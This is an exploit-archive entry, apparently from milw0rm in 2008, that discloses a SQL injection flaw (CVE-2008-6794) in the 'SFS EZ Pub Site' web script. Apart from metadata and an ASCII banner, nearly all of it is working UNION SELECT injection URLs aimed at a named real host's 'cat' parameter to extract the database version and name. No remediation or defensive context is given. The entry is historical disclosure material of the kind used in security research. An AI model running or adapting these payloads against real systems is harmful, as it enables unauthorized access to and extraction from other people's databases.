SFS EZ Pub Site - SQL Injection

EKU-ID: 14796	CVE: OSVDB-49483;CVE-2008-6794	OSVDB-ID:
Author: Hakxer	Published: 2008-11-01	Verified:
Download:

Rating

☆☆☆☆☆

###########################################################################
      ______    __  __   ______          __                ______
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
        /____/

# Discovered by : Hakxer
# Type Gap : SQL Injection
# Script : 	SFS EZ Pub Site
# Greetz : Allah , Egyptian x hacker , Str0ke  :)
##########################################################################

# [~] Poc :
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
# [~] Exploit :
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/*
OR
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*


# Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-01]